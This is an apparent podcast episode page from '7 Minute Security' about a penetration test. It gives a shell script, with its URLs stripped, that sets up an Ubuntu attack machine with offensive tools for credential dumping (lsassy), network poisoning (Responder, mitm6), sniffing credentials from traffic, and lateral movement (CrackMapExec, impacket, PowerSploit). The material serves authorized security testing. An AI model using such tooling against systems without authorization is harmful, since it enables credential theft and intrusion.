Preview Mode Links will not work in preview mode

7 Minute Security

Sep 16, 2020

Yay! It's time for another tale of pentest pwnage! Highlights include:

  • Making sure you take multiple rounds of "dumps" to get all the delicious local admin creds.

  • Why lsassy is my new best friend.

  • I gave a try to using a Ubuntu box instead of Kali as my attacking system for this test. I had pretty good results. Here's my script to quickly give Ubuntu a Kali-like flair:

 sudo apt-get update sudo apt-get upgrade -y sudo apt-get install openssh-server -y  sudo apt-get install nmap curl dnsrecon git net-tools open-vm-tools-desktop python3.8 python3-pip unzip wget xsltproc -y  #Aha helps take output from and make it nice and HTML-y sudo git clone /opt/aha  #Awesome-nmap-grep makes it easy to grep nmap exports for just the data you need! sudo git clone /opt/awesome-nmap-grep  #bpatty is...well...bpatty! sudo git clone /opt/bpatty  #CrackMapExec is...awesome  sudo mkdir /opt/cme cd /opt/cme sudo curl -L -o sudo unzip sudo chmod +x ./cme  #eyewitness is a nice recon tool for putting some great visualization behind nmap scans sudo git clone /opt/eyewitness cd /opt/eyewitness/Python/setup sudo ./  #impacket is "a collection of Python classes for working with network protocols" #I currently primarily use it for sudo git clone /opt/impacket cd /opt/impacket sudo pip3 install .  #mitm6 is a way to tinker with ip6 and get around some ip4-level protections sudo git clone /opt/mitm6 cd /opt/mitm6 sudo pip3 install -r requirements.txt  # install service-identity sudo pip3 install service-identity  # lsassy sudo python3 -m pip install lsassy  #nmap-bootstrap-xsl turns nmap scan output into pretty HTML sudo git clone /opt/nmap-bootstrap-xsl  #netcreds "Sniffs sensitive data from interface or pcap" sudo git clone /opt/netcreds  #PCCredz parses pcaps for sensitive data sudo git clone /opt/pcredz  #Powersploit is "a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment" sudo git clone /opt/powersploit  #PowerupSQL is a tool for discovering, enumerating and potentially pwning SQL servers! sudo git clone /opt/powerupsql  #responder is awesome for LLMNR, NBT-NS and MDNS poisoning sudo git clone /opt/responder